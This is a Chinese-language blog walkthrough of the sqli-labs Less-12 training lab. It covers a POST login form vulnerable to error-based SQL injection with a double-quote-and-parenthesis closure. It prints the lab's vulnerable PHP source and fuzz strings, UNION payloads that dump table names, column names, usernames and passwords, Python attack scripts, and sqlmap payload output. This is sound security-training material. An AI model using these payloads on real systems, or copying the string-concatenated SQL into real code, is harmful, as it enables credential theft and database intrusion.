sqli-lab-less12

最新推荐文章于 2024-05-17 09:42:48 发布
最新推荐文章于 2024-05-17 09:42:48 发布
阅读量108 收藏
点赞数
分类专栏: sql注入 文章标签: 数据库 网络安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sa1nZen/article/details/132083391
版权
sqli-lab-less12

一、靶标地址

Less-12 POST-Error Based-Double quotes-String - with twist
#字符型带双引号和括号基于报错的SQL注入
http://127.0.0.1/sqli/less-12/

二、漏洞探测

输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#Your Login name:admin
#Your Password:admin

猜测业务逻辑流程应该是根据输入的username、password去查询然后进行比对
uname=1")&passwd=2&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '") and password=("2") LIMIT 0,1' at line 1

猜测语句为 ") and password=("2") LIMIT 0,1
推测语句为select username,password from users where username= ("$uname") and password='$passwd' limit 0,1;

fuzz.txt
'
"
')
")
'))
"))

#使用python脚本进行fuzz
import requests

url="http://192.168.128.159/sqli/less-12/index.php"
#F12查看或者burpsuite抓包
header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
file = open("./fuzz-12.txt","r")
payloads = file.read().splitlines()

for i in range(len(payloads)):
    print("==============This is "+ str(i) + payloads[i]+"==============")
    subpayload = "1" + payloads[i]
    payload = {
            "uname" : subpayload,
            "passwd" : "1"
    }
    response=requests.post(url,headers=header,data=payload)
    print(response.text)

三、源码分析

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
	$uname=$_POST['uname'];
	$passwd=$_POST['passwd'];

	//logging the connection parameters to a file for analysis.
	$fp=fopen('result.txt','a');
	fwrite($fp,'User Name:'.$uname."\n");
	fwrite($fp,'Password:'.$passwd."\n");
	fclose($fp);


	// connectivity
	$uname='"'.$uname.'"';
	$passwd='"'.$passwd.'"'; 
	@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);

	if($row)
	{
  		//echo '<font color= "#0000ff">';	
  		
  		echo "<br>";
		echo '<font color= "#FFFF00" font size = 4>';
		//echo " You Have successfully logged in " ;
		echo '<font size="3" color="#0000ff">';	
		echo "<br>";
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";
		echo "</font>";
		echo "<br>";
		echo "<br>";
		echo '<img src="../images/flag.jpg"   />';	
		
  		echo "</font>";
  	}
	else  
	{
		echo '<font color= "#0000ff" font size="3">';
		//echo "Try again looser";
		print_r(mysql_error());
		echo "</br>";
		echo "</br>";
		echo "</br>";
		echo '<img src="../images/slap.jpg"   />';	
		echo "</font>";  
	}
}

?>

四、黑盒与白盒测试

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"'; 
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

#查询用户和数据库
uname=1") union select user(),database() #&passwd=1&submit=Submit
#报错 这里不能使用--+ 而使用#不会报错
uname=1' union select user(),database() --+&passwd=1&submit=Submit
#uname=1不会有任何回显,所以后面的两个值可以被回显出来
select username,password from users where username=("1") union select user(),database() #' and password=("1") limit 0,1;

#查询表名
uname=1") union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),database() #&passwd=1&submit=Submit

#查询字段名
uname=1") union select (select group_concat(column_name) from information_schema.columns where table_name='users'),database() #&passwd=1&submit=Submit

#查询字段值
uname=1") union select (select group_concat(username) from users),database() #&passwd=1&submit=Submit
uname=1") union select (select group_concat(password) from users),database() #&passwd=1&submit=Submit

五、脚本撰写

import requests

url="http://192.168.128.159/sqli/less-12/index.php"
#F12查看或者burpsuite抓包
header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload = {
        "uname" : "1\") union select user(),database() #",
        "passwd" : "admin"
}
response=requests.post(url,headers=header,data=payload)
print(response.text)

六、sqlmap

sqlmap -u "http://192.168.128.159/sqli/Less-12/" --data "uname=1&passwd=1&submit=Submit" --batch

Parameter: uname (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uname=1") OR NOT 8916=8916#&passwd=1&submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=1") AND (SELECT 4663 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(4663=4663,1))),0x7171717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("JyBN"="JyBN&passwd=1&submit=Submit

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1") AND (SELECT 8405 FROM (SELECT(SLEEP(5)))MNFl) AND ("TVUz"="TVUz&passwd=1&submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=1") UNION ALL SELECT NULL,CONCAT(0x716a706a71,0x674d56426a6c737944506f647a52447875467642456b6668746d774443625075704f445572737070,0x7171717071)#&passwd=1&submit=Submit

七、总结

1、通过表单提交数据
2、sqlmap新用法
Sa1nZen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-lab通关txt
07-22
sqli-lab1~10的通关txt,其中包含了注入代码以及相关注解 代码由于存储在txt中,无法直接复制使用,请手打。 (可能是由于编码问题)
sqli-labs less-11 & less-12
water0diamond的博客
03-17 893
POST-Error Based-Single quotes-String (基于错误的POST单引号字符型注入) Less-11 POST-Error Based-Double quotes-String-with twist (基于错误的双引号POST型字符型变形的注入)Less-12 前面10关都是get型的,而从现在开始我们进入post型关卡 post是一种数据提...
sqli-labs Less-11,12
2202_75317918的博客
05-21 712
sqli-labs Less-11,12
sqli-labs(less-12)
筱阳的博客
06-08 1106
有问题....为什么在less-11输入admin' 会报错  输入admin"" 就不会报错在less-12输入admin" 会报错  输入admin' 就不会报错后来发现输入admin'") 都可以使他们报错,哈哈哈这样即可知道是通过("")来闭合参数的接下来就和less-11一样的操作了接下来用sqlmap同理...
sqlmap中常用的几个命令
liweibin812的博客
02-28 1371
1. -u:表示需要探测的目标站点url,例如: sqlmap.py -u http://127.0.0.1/sql1/Less-1/?id=1 注:如果url后参数个数大于等于2个,则需要加上双引号 sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1&amp;username=zhangsan" 2. -r:表示判断一个文本中的请求...
sqli————Less-12
Fly_鹏程万里
05-11 614
Less-12源代码:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt; &lt;html xmlns="http://www.w3.org/1999/xhtml"&gt; &lt;head&gt..
sqli-less12题解详细过程
weixin_44352058的博客
04-22 847
sqli-less12题解 首先我们打开less12看一下 这个题目具有交互界面,有username和password,所以这里我们用不到bp进行拦截。那我们就开始找注入点。 1.在username和password 中都输入 admin 查看结果,可以正常登陆 1: username: admin password: admin 2.那就在username中输入 admin’测试 ...
第三节 Sqli-lab环境搭建-01
09-15
第三节 Sqli-lab环境搭建-01
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-lab注入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs (less-12)
kukudeshuo的博客
03-09 1071
sqli-labs (less-12) 进入12关,我们发现页面和11关一样,我们先输入用户名和密码进去,我们发现用户名和密码也是使用POST的方式传了上去,那我们像11关一样使用hackbar抓取POST请求 判断注入类型 uname=admin'&passwd=admin&submit=Submit #页面不报错 uname=admin"&passwd=admin&submit=Submit #页面有错误显示 根据输入"时的报错信息我们确定闭合方式为"),也确定为
使用sqlmap对sqli-less-12 的题解
weixin_44352058的博客
05-03 696
1.由于该题是post注入,所以我们在用户名密码处随意输入并使用bp进行抓包存储文件。 2.查询注入点 sqlmap.py -r 1.txt 3.查询数据库 sqlmap.py -r 1.txt –dbs 4.查询表 sqlmap.py -r 1.txt -D security –tables 5.查询列 sqlmap.py -r 1.txt -D security -T u...
sqli-labs的less11-14
abwn1278的博客
09-04 99
less11;   明显和前面不同了,需要输入账户名和密码了,那么,很明显,这并不是一个get方式了。   随意输入一个123,123,明显返回错误了。   用burpsuite来抓下包,代理什么的都不在这配置了。   界面输入123,123提交。抓包获得参数。      在得到参数后,直接将参数写入的sqlmap的data段。      系统就把这个请求变成po...
SQLi LABS Less-12 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-21 1万+
sqli第十二关,sqli-labs less-12,sqlilabs less12
网络安全-sqlmap实战之sqlilabs-Less12
关注网络安全、云原生安全
07-10 1018
目录 类型 -dbs枚举数据库 类型 基于错误-字符串 错误回显 通过回显可以看出比Less11加了括号 猜测sql语句 select * from users where username=("参数") and password=("参数") LIMIT 0,1 -dbs枚举数据库 python sqlmap.py -r "E:\Workspace\Burp_suite_workspace\less12" --dbms mysql -dbs 不要--batch 不使用--b
实战项目技术点(1)
qq_60396437的博客
05-15 1084
分页插件PageHelper 是 Mybatis 的一款功能强大、方便易用的分页插件,支持任何形式的单标、多表的分页查询。官网:https://pagehelper.github.io/。文件上传,是指将本地图片、视频、音频等文件上传到服务器,供其他用户浏览或下载的过程。
php centos选择sqlserver的驱动和扩展选择版本的说明
Z.X的博客
05-14 437
2023年2月23日13:41:48首先是php php扩展 驱动 数据库的关系 官方文档说明: https://learn.microsoft.com/zh-cn/sql/connect/php/step-1-configure-development-environment-for-php-development?view=sql-server-2017https://learn.microsoft.com/zh-cn/sql/connect/php/system-requirements-for-th
生产报表工具PI DataLInk 与 行列视之间的区别
最新发布
2401_83701843的博客
05-17 143
行列视,全名“行列视生产数据应用系统”,行列视品牌所面对的业务范围远远超越了PIDatalink报表工具,他首先是一款本地部署的在线Excel文档管理系统,解决个人报表在线管理问题,其次,她和PIDataLInk一样,也是面向实时数据库报表需求的一套工具,其区别在于行列视品牌兼容国内外大多数实时数据库,也可以同时连接多个数据源,也就是她完全可以替代PI-DataLINk,同时也适用于其他品牌下的实时数据库系统;
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值